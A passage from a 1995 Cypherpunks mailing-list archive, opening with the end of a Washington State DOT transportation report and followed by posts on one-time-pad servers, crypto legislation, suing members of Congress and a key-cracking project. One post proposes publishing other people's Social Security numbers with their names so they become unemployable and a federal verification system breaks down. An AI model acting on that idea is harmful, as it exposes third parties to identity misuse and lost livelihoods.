passenger counting systems and automatic vehicle location systems on 
board the 10% of the current fleet that have APC systems installed.

.c.other Projects

%	.c.Traffic Congestion Monitoring-Urban Areas.;  (Bill Legg or 
Mark Hallenbeck) There are three basic objectives for this study.  (1) 
Develop a comprehensive understanding of the congestion monitoring needs 
and expectations of local, state, and federal governments and agencies.  
(2) Define the alternative methods for performing that monitoring 
function.  (3) Develop cost and staffing estimates that can be provided 
to state officials in decision package form, so that a monitoring system 
based on one of these alternatives can be implemented.
This project will provide a resource document that lists the potential 
methods for monitoring congestion in the state's urban areas.  It will 
describe the types of data that need to be collected, the strengths and 
limitations of each of the methods or combinations of methods that can be 
used for collecting those data, and preliminary costs for implementation 
of those data collection procedures.  The project will provide 
descriptions of both systems that can be implemented using currently 
available technologies, and those systems that rely on technologies that 
are currently experimental but may provide greater levels of information 
gathering at a lower cost than traditional methods, if the new methods 
are implemented on an urban scale.
The Phase 2 draft report is being revised to reflect comments received 
from review.

%	.c.ENTERPRISE.;  (Bill Legg )  The ENTERPRISE Program represents 
an international forum for collaborative research, development, and 
deployment ventures.  This forum will facilitate the sharing of 
technological and institutional experiences gained from the IVHS programs 
conceived and initiated by each participating entity.  The cooperative 
and collaborative objectives of the ENTERPRISE Program provide for a more 
efficient use of resources than a series of independent initiatives.  The 
synergistic effect of this forum is an accelerated implementation of IVHS 
programs.  Current members of ENTERPRISE aside from WSDOT include; CDOT, 
AzDOT, MinnDOT, IDOT, MichDOT, NCDOT, Maricopa County DOT in AZ. FHWA, 
Ministry of Transportation of Ontario, Transport Canada, and 
Rijkswaterstaat (Netherlands DOT). Others considering joining are NYDOT, 
and the Federal DOT of Mexico.  ENTERPRISE holds quarterly meetings, in 
1994 that will be changed to 3 times a year.  The last meeting of 
ENTERPRISE was held in April 1994.  The next meeting will be in 
September, 1994 followed by a December 1994 meeting to be held in 
Seattle.  I have notes as well as minutes of previous meetings.  In 
conjunction with the September meeting ENTERPRISE will cosponsor the 2nd 
annual Rural IVHS conference with IVHS America.  The first Rural IVHS 
conference was held in February, 1993, it was sponsored by ENTERPRISE.  
ENTERPRISE is the major backer of ITIS, which is the development of an 
international standard for communications between the roadside and 
vehicles.  ENTERPRISE is also working on joint funding of several project 
proposals submitted by member organizations.  One project that is 
currently underway is HERALD, which is investigating using an AM 
sub-carrier to deliver road and construction information to motorists in 
rural areas.  ENTERPRISE submitted two proposals to FHWA as demonstration 
projects; the first is a second phase of the HERALD project, the second 
is a wide scale MAYDAY project.  FHWA accepted both of these projects for 
funding, they are now just getting underway; the interagency agreements 
and contracts are being developed and signed by the involved parties.  
Since WSDOT is a partner in a second funded MAYDAY operational test we 
will be working closely with ENTERPRISE to avoid duplication in effort 
and to share information.  I will use this report to provide updates on 
the ENTERPRISE operational tests.
The latest meeting for this group was held in Phoenix in April.  The next 
meeting will be in Minnesota in September in conjunction with the 1995 
Rural ITS conference.  The 1996 rural ITS conference will be held in 
Spokane, WSDOT will be the host agency.

%	.c.Accident Risks Using Roadway Geometrics.;  (Eldon L. Jacobson, 
Fred L. Mannering)  The work is being done by John Milton, a WSDOT 
graduate student.  The primary objective of this project is to test the 
statistical validity of the accident prediction method WSDOT is 
developing and utilizing.  The findings of this research will be used to 
develop a weighted equation for use in the Department's safety program.  
The data has been collected and most of the literature review has been 
completed.  Development and testing of accident frequency models began at 
the end of December, 1994.

%	.c.Advanced Transportation Technology Application Policy Plan.;  
(Bill Legg) This effort is looking at establishing ITS, or in this case 
Advanced Transportation Technology, as a new policy area in the 
Transportation Policy Plan for Washington State.  The first subcommittee 
meeting on this effort will be held on July 11th.  A second meeting will 
be held in August.


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Fri, 14 Jul 95 06:53:15 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: OTP server..
In-Reply-To: <Pine.3.89.9507131817.A10819-0100000@khijol>
Message-ID: <Pine.A32.3.91.950714095006.11806M-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Ed Carp [khijol Sysadmin] wrote:

> On Fri, 14 Jul 1995, Black Unicorn wrote:
> 
> > >How about WWW one time pad servers? You browse to your
> > >favorite OTP server, which has a random number generator
> > >running in the background. You tell it to give you a block
> > >of X bytes, and mail it to persons 1, 2, 3, ... N.
> > 
> > I think you're trusting the server a GREAT deal.
> 
> Why is that?  The randomness of the data can be easily checked...

Because if the server is compromised to KEEP the data that it mails to 
you and those other people, you can have a PERFECTLY random OTP, and 
because of the particulars of XOR, your communication has been compromised.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 14 Jul 95 07:01:42 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <36063.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Thu, 13 Jul 1995 16:12:16 -0700,
  tcmay@sensemedia.net (Timothy C. May)  writes:
>
> There was once talk, in April of '93, about the Washington, D.C.
> Cypherpunks group adopting "lobbying" as their own special focus area,
> with educational visits to Congressional aides and attendance at
> crypto-related hearings. Nothing came of this, for whatever reasons.

My cut on why it failed is that lobbying is too hard to do effectivly on a
part time basis, and those attending that the meeting realised it.

On a full time basis, lobbying is expensive, and requires that you raise
tons of money. The EFF found tons of money, and sponsored last year's
Digital Telephony disaster. He who pays the piper names the tune. EFF
got lots of corporate money, and "liked" the 94 DT bill.
So they're gone.

> say one thing: the leaders of EFF may have realized what a trap lobbying
> can become, and have chosen to instead focus on other areas.)

I read this in their actions too.

> Anyway, Cypherpunks is a worldwide, technological-oriented group. We can

Cypherpunks write code?

There is nothing vaguely pro-government about much of strong cryptography.
Tim's sig, fall of governments, and all that. Why should they listen to us?
Write code. Send money to EPIC and ACLU, let them lobby.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Fri, 14 Jul 95 07:04:13 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Legislation question...
In-Reply-To: <199507140331.AA07147@tyrell.net>
Message-ID: <Pine.A32.3.91.950714100142.11806T-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Phil Fraering wrote:

> I may be a bit behind the times, but I have a question
> about the "ban crypto-anarchy" legislation as well as
> the Exon amendment:
> 
> Isn't legislation in this country supposed to start in the
> House and _then_ move to the Senate for approval?

Only ones that involve money.  The House was given the Power of the Purse 
by the original Constitutional Congress.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Fri, 14 Jul 95 11:04:13 PDT
To: cypherpunks@toad.com
Subject: Russians seek expert help
Message-ID: <2340@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


A collegue from Russia sent me an email that I expert (with 
permission):

Forwarded message follows:

> Upon my return to Russia I have met with
> one of the best information protection & computer
> data security firms in Russia.  They have
> their own developments in the field of computer
> security and, noteably, the special journal
> devoted to the cryptography and other information
> protection technics as well as legal aspects
> of these technologies. It is the single and thus
> best publication of this kind in Russia.
> 
> They have asked me to help them to get in
> touch with western specialists in the field
> of law & information technology protection.
> They would be happy to publish some articles (translations,
> of course) and find other ways of cooperation.
> 
> I suggest that either you personally or colleagues
> of yours would be interested in communicating
> on these matters with Russian specialists.
> 
> Their contact e-mail is hotline@confident.spb.su
> You may address the message to Petr Kuznetsov,
> he is a director of this firm.
> 
> cc: Peter Kouznetsov
> 

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Fri, 14 Jul 95 02:14:49 PDT
To: cypherpunks@toad.com
Subject: Re: OTP server..
In-Reply-To: <v02130500ac2cc7c4390a@[205.219.167.38]>
Message-ID: <Pine.SOL.3.91.950714101031.4143D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Black Unicorn wrote:

> doug@eng.auburn.edu wrote:
>> How about WWW one time pad servers? You browse to your
>> favorite OTP server, which has a random number generator
>> running in the background. You tell it to give you a block
>> of X bytes, and mail it to persons 1, 2, 3, ... N.
>> [...]
>> Thoughts?
>>
> I think you're trusting the server a GREAT deal.

A small addition to the protocol whereby the recipient gives the random 
data the once-over with a personal IDEA key would be sufficient to 
eliminate any doubts about the server.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 14 Jul 95 08:36:26 PDT
To: cypherpunks@toad.com
Subject: So, where's the key?
Message-ID: <199507141533.AA17772@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Cypherpunks Key-Cracking project is complete, but AFAIK no one's
reported the successful key. Either people haven't completed all the
key chunks they've signed out for, or something's wrong with our
methodology.

A third alternative is that the lucky lottery winner just missed the
results, and a fourth is that I just missed it.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAaOQKfb4pLe9tolAQF8EgQApwrvjBHEPkI2VWG9NaaFU4yHKtkj9EZX
ok3xvAfIYslKqPOJ1nJH9KBxBxNk7Dk8xMPxfnfGzPWyUqwLyeBofSdTxTmWf+An
6OiVeT4RLLIJadQbunJHhXZHq7sdOH7HKQ8SpvGSXC0/ZT1XAPOjf6swBBC0LRWS
Rb8wlPCy4zs=
=cKVs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schwartz@bach.convex.com (Adam E. Schwartz)
Date: Fri, 14 Jul 95 12:49:15 PDT
To: nsamuels@Mars.mcs.com (Nicholas Samuels)
Subject: Re: The MoJo Wire thanks you
In-Reply-To: <Pine.3.89.9507140848.C14641-0100000@Mars.mcs.com>
Message-ID: <199507141542.KAA12126@bach.convex.com>
MIME-Version: 1.0
Content-Type: text/plain


hello everybody,

Please direct all your future replies related to this message and the
Mother Jones junk to

	truher@mojones.com

Also, please do *not* "group reply":  check to ensure that only 
truher@mojones.com is included in the "To:" part of the email
header, and do not include anyone in the "Cc:" part of the
email header.

Thanks very much.

(BTW, I have absolutely nothing to do with Mother Jones or its WWW site.)



Nicholas Samuels writes:
>
>With this message, you also included a note from silversh@rmmi.com, 
>wishing to "unsubscribe."  Since I don't administer your listserv, you 
>might want to do something with that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 14 Jul 95 07:51:03 PDT
To: cypherpunks@toad.com
Subject: Re: HR361
Message-ID: <9507141445.AA10682@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


  Has anyone previously noted that HR361, the omnibus export
  administration act, would require the administration to assess the
  impact of the current crypto export controls on the software industry?

I don't recall seeing mention of it, but this has been planned for
awhile.  There were a couple of crypto surveys, one by private industry
(software publisher's association) and one by TIS for the gov't.  I think.

Both were mentioned in this list.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 14 Jul 95 08:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: LD tentacle?
Message-ID: <9507141513.AA10727@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: jbass@dmsd.com (John L. Bass)

He is a long-long-time Unix hacker.  Designed the first file-locking
stuff (flock?) and gave it away to the Unix community.  Last I heard
was working on high-performance filesystems.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 08:19:30 PDT
To: cypherpunks@toad.com
Subject: MYS_fit
Message-ID: <199507141519.LAA15117@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper Page Oner, longish:


   "2 Groups of Physicists Produce Matter That Einstein
   Postulated."

      By chilling a cloud of atoms to a temperature barely
      above absolute zero, scientists at a Colorado laboratory
      have at last created a bizarre type of matter that had
      eluded experimenters ever since its potential existence
      was postulated by Albert Einstein 70 years ago. The
      creation of this Bose-Einstein condensate -- named for
      Einstein, and the Indian theorist Satyendra Nath Bose --
      was hailed yesterday as the basis of a new field of
      research expected to explain some fundamental mysteries
      of atomic physics. A Texas group later produced similar
      results. The achievement should allow physicists to peer
      directly into the realm of the ultrasmall.     MYS_fit


   [This was also reported in The Economist of July 1.]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 14 Jul 95 08:21:52 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: Root Causes
Message-ID: <199507141521.LAA09745@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:42 PM 7/13/95 -0500, David K. Merriman wrote:

>Is there any precedence or possibility of either filing civil or criminal
>charges against a Government official for their _official_ actions?
>Something that will not only make for some Serious Press, but hit them from
>an unexpected angle?

Constitution of the US
 
Article 1, Section 6

(1.) The Senators and Representatives shall receive a Compensation for 
their Services to be ascertained by Law, and paid out of the Treasury of the 
United States. They shall in all Cases, except Treason, Felony and Breach 
of the Peace, be privileged from Arrest during their Attendance at the 
Session of their respective Houses, and in going to and returning from the 
same; and for any Speech or Debate in either House, they shall not be 
questioned in any other Place.


DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 08:21:27 PDT
To: cypherpunks@toad.com
Subject: SEK_hep
Message-ID: <199507141521.LAA15320@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper:


   "U.S. Spells Out Antitrust Inquiry Into Microsoft."

      The Justice Department said today that the Microsoft
      Corporation might well be violating antitrust laws by
      including software for its new on-line network in
      Windows 95, its much-anticipated operating system for
      personal computers.                            JUS_kid


   "Sting on Internet Leads to a Child Sex Case."

      In a case involving child pornography, the Internet and
      a self-appointed enforcer whom one critical defense
      lawyer calls an "electronic vigilante," a Nevada man is
      facing prison for crossing state lines with the
      intention of having sex with a 14 year-old girl he had
      met on a popular computer network.             SHE_dev


   [Editorial] "The Guns of Waco and Ruby Ridge."

      There is little doubt that the Federal Government
      contributed heavily to two of the biggest law
      enforcement fiascoes in recent memory. One was the
      disastrous 1993 Federal raid on the Branch Davidian
      compound at Waco, Tex. The other was the tragic 1992
      encounter between the F.B.I. and a band of white
      separatists at Ruby Ridge, Idaho.              LIT_bub



   3:  SEK_hep







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Fri, 14 Jul 95 11:31:42 PDT
To: cypherpunks@toad.com
Subject: Re: Legislation question...
In-Reply-To: <199507140331.AA07147@tyrell.net>
Message-ID: <199507141831.LAA07706@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
 > BTW, in re suing congressmen
 > 
 > "The Senators and Representatives shall [...] in all cases, except
 > treason, felony and breach of the peace, be privileged from arrest
 > during their attendance at the session of their respective Houses, and
 > in going to and returning from the same; and for any speech or debate
 > in either House, they shall not be questioned in any other place."
 > 
 > The last part being operative.

Article VI

Clause 3. The Senators and Representatives before mentioned, and the
          Members of the several State Legislatures, and all executive
          and judicial Officers, both shall be bound by Oath or
          Affirmation, to support this Constitution; but no religious
          Test shall ever be required as a Qualification to any Office
          or public Trust under the United States. 

Does any mechanism exist for removing Oath-breakers from office?  Any
member of Congress who proposes or votes for (as distinguished from
"speech or debate") unconstitutional legislation has clearly violated
their Oath, and hence are no longer legitimate holders of the office.

     Would someone who refused to be "bound by Oath or Affirmation" be
allowed to take a seat in the Congress?  If not, why should an
Oath-breaker be allowed to?

     Yes, I know, they'll do whatever the hell they want.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAa4BO5Yg08fDKehAQGOQgQAjBP3g5LZY6YE/8IHsG/PXFlyE4PNYRaP
cIZ+y9MKWPP81kQPqGggnrDl6DcllWQmNW+cNrcOXraJnLutUlXDEnY6s3TXP34h
5L8oFzUNJSBl3GqKHxXOMMVdDXUeB8afUxbmCHrCQjq5QLSux4uIGBRd44VfVW4C
dxoBmom+FQU=
=kfH+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 14 Jul 95 08:51:06 PDT
To: cypherpunks@toad.com
Subject: Proposed SS#/Federal Job Licensing DOS Attack
Message-ID: <199507141550.LAA15525@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On another subject entirely...

I have naturally been concerned about the Feds' proposal to set up
a national job licensing system.  In order to protect us from
hordes of illegals, they have suggested that employers be required
to check SS#-True Name matches before employment could begin.

This amounts to requiring federal permission for the 55 million 
annual job changes.  Initially, it is supposed to be restricted to
checking SS# validity, name match, and non multiple use.  Later (as with
driver's licenses) they will add restrictions having to do with tax
compliance, child support compliance, library fine compliance, etc.
After all, we wouldn't want tax evading, deadbeat dad, library
scofflaws working in Amerika, would we?

This suggests am interesting Denial of Service (DOS) attack.  If
you published your own or others' SS#-True Name pairs on a public
forum (currently completely legal BTW), multiple use could be 
encouraged, the TrueNames would become unemployable, and interesting
litigation would result.  If done enough, systemic breakdown would
occur.

I am anxious to see the regs (they are just at the talking stage) to
see how they handle "exceptions" like thus.

DCF

"Who in spite of the fact that he has changed jobs since November 1986, has
yet to fill out an I-9 form.  He *loves* contract employment." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey Barth <jbarth@cozumel.picnet.com>
Date: Fri, 14 Jul 95 11:56:14 PDT
To: Nicholas Samuels <nsamuels@Mars.mcs.com>
Subject: Re: The MoJo Wire thanks you
In-Reply-To: <Pine.3.89.9507140848.C14641-0100000@Mars.mcs.com>
Message-ID: <Pine.SGI.3.90.950714121749.6465B-100000@cozumel>
MIME-Version: 1.0
Content-Type: text/plain


I am not sure if you realize that this discussion is appearing all over 
the place.  I am somewhat interested in this conversation, but not really.

==================================================================  
                 Potomac Interactive Corporation
------------------------------------------------------------------
E-mail: jbarth@picnet.com  Voice: 703.276.0181   Fax: 703.276.2981 
==================================================================

On Fri, 14 Jul 1995, Nicholas Samuels wrote:

> With this message, you also included a note from silversh@rmmi.com, 
> wishing to "unsubscribe."  Since I don't administer your listserv, you 
> might want to do something with that.
> 
> On Thu, 13 Jul 1995, Joel B. Truher wrote:
> 
> > Thank you for your help in our beta test!  Please come back soon,
> > and send me mail if you'd like to be removed from this mailing
> > list -- we may send a new Web product announcement every few months,
> > and you'll soon receive a survey of your opinion of our site.
> > 
> > More info on The MoJo Wire:
> > 
> > 
> >              "More fun than a secret decoder ring!"
> >                                -- Jim Hightower
> > 
> >   "Mother Jones magazine is turning the tables [on Gingrich]"
> >                                -- LA Times
> > 
> > Mother Jones is pleased to announce the official release of our
> > redesigned WWW site, now called The MoJo Wire, on July 14th, at:
> > 
> >                     http://motherjones.com
> > 
> > * See Newt Gingrich's secret list of major funders on our "Coin-
> >   Operated Congress" feature.  Gingrich is fighting the FEC in
> >   court to keep this information secret, but you can see it here
> >   for the first time.  See the ten worst, the ten richest, the
> >   dirt on all of them, and help complete this interactive
> >   investigation project.
> > 
> > * Newly revamped on-line chat software, called Live Wire,
> >   provides the best Web-based political discussions anywhere.
> >   Create hyperlinks in the words of others in this new feature,
> >   which already contains several lively debates.
> > 
> > * The July/August issue of Mother Jones magazine is available
> >   only on The MoJo Wire.  Read the full text of the magazine.
> > 
> > Many thanks to our team of two thousand beta testers!  With your
> > help, we've worked a few of the last kinks out of the system,
> > added a few things, and now offer the service password-free.
> > 
> > For more information about The MoJo Wire, send mail to
> > truher@mojones.com, or call me at 415-665-6637.
> > 
> > Joel Truher
> > Manager, The MoJo Wire
> > 
> > 
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Fri, 14 Jul 95 09:48:09 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <199507141652.LAA20979@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Doug Barnes wrote:>
>This means, for those not reading between the lines, doing something
>more than online ranting and petition-signing, such as getting out the
>checkbook and supporting those who are organized to fight these things,
>and actually getting off the dime and doing things like writing letters,
>sending telegrams, and otherwise harassing our elected beings through
>media that they understand (since, clearly, they _don't_ understand
>the Internet -- if they did, they wouldn't propose legislation like this.)
>
>Yes, the "bad guys" can crank out unfriendly legislation faster than
>the "good guys" can fight it, but since we are clearly not ready to offer
>technological solutions this month, the "good guys" act as a valuable
>brake on this current swing of the pendulum.
>
Cypherpunks can do more by being cypherpunks.  Your keyboards are
better weapons than checkbooks in this case.  Why isn't PGP so simple
that every luzer on AOL will use it without thinking?  Why hasn't
the NetScape key been broken?  Prove these proposed laws are just as
silly and ineffective as they look by demonstrating it.

Lots of people will attack these laws on legal grounds, and you should
too if your conscience so moves you, but very few have the
capabilities to attack them on technical grounds where their
vulnerabilities are real, not just a matter of opinion.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Fri, 14 Jul 95 10:35:24 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: misfeasance in office (was: Re: Root Causes)
In-Reply-To: <9507140252.AA13485@snark.imsi.com>
Message-ID: <Pine.3.89.9507141215.B8511-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> David K. Merriman writes:
> > 
> > Is there any precedence or possibility of either filing civil or criminal
> > charges against a Government official for their _official_ actions?
> 
> Not only is it a bad idea politically, but in fact members of congress
> are made specifically immune by the constitution from any legal action
> being taken against them for their words or actions during sessions of
> congress by any body other than congress.

While I recognize this to be the case, it remains exceedingly
frustrating.  It would seem that a textbook example of
misfeasance (not malfeasance) would be the act of introducing
and/or participating in the passage of legislation that a
member knew or should have known was unconstitutional -- at
least when misfeasance is defined as "the performance of a duty
or right which one has the right to do, but in a manner such as
to infringe upon the rights of others."  [anno. 20 ALR 104]

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Fri, 14 Jul 95 10:42:52 PDT
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Suing/Reputations (was: Root Causes)
In-Reply-To: <199507140314.XAA05815@yakko.cs.wmich.edu>
Message-ID: <Pine.3.89.9507141223.A8798-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Damaged Justice wrote:

> Title 42 of the United States Code is the section that describes
> the process by which one may sue a government official. However:
> 
> "...an officer may be held liable in damages to any person injured in
> consequence of a breach of any of the duties connected with his
> office...The liability for nonfeasance, misfeasance, and for malfeasance
> in office is in his 'individual', not his official capacity..." 70
> AmJur2nd Sec. 50, VII Civil Liability.
> 
> So the trick is to sue the offender as an individual, and not as a
> government official.

I composed my "misfeasance in office" post before reading this
thoughtful  and well researched message from Damaged Justice.
I had read all of the messages in my mailbox with "Re: Root
Causes" as the subject, but missed this one, since the subject
line had been changed.

Damaged Justice has looked into this in much greater depth than
I have, and raises some interesting possibilities.  
(Obviously, IANAL.)

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 14 Jul 95 10:45:10 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Minnesota Cypherpunks Meeting
Message-ID: <Pine.ULT.3.91.950714124244.8005A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I mentioned this before and there seemed to be support, but I wanted to 
bring it up again hoping somebody in the cities can grab the ball and run 
with it (I doubt y'all wanna drive to Mankato :-)

Anybody wanna plan for a Minnesota CP Physical meeting sometime soon?  
Maybe on Friday the 28th or something?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAatLjokqlyVGmCFAQEutgQAmNL494sDhzzGXw2M/RW3PvmOYruv1cwA
PesJpE31LDr5S2i4Qi+59/LDkv2FY9Ut90FfrQj8dNtwF1CvFQUcEFIZrMpApsK9
O+/vUkO7Q4DZ0vXrYvSbpKY/03mqy7dvWKCY1d/wFc4Il8G/GgdHvASavHEKv6At
H5OICAkXM9M=
=AfJm
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Fri, 14 Jul 95 10:25:00 PDT
To: cypherpunks@toad.com
Subject: (none)
Message-ID: <2387@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 In message
<Pine.ULT.3.91.950713200640.19067A-100000@krypton.mankato.msus.edu> "Robert A. Hayden" writes:

 [major cuts everywhere]
 > 
 > I've received about a dozen requests to clarify my rant earlier about 
 > what I think needs to be done about the future of the CPs and the net, 
 > now that the official declaration of war has been made by the government. 
 
 Let's all take a deep breath here. If the Grassley bill becomes
 law, this sort of talk may have merit. At this stage, it's too
 strong.  So far the only declaration made is by one or more 
 Senators, not "the government".

> 2)	PUSH FOR UNIVERSAL DIGITAL SIGNATURES
> In my version of utopia, all digital messages are signed.  Unfortunately,
> right now, there are no mechanisms in place to achieve that.  
 
 Sadly, the American Bar Association project that is writing model 
 legislation for this has been delayed.  A public discussion 
 draft, which should really move the ball forward, is not going 
 to happen until after our next meeting in August.  Expect 
 something published on the web in mid-September. Model 
 legislation is needed to sort out liability issues, for example, 
 without which large companies are afraid to enter the business.
 
 -- 
 Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
 U.Miami School of Law                                     London, England
 mfroomki@umiami.ir.miami.edu <-- this will still find me
 PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.
 

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alan.pugh@internetmci.com (Alan Pugh)
Date: Fri, 14 Jul 95 10:14:35 PDT
To: cypherpunks@toad.com
Subject: pgp mention
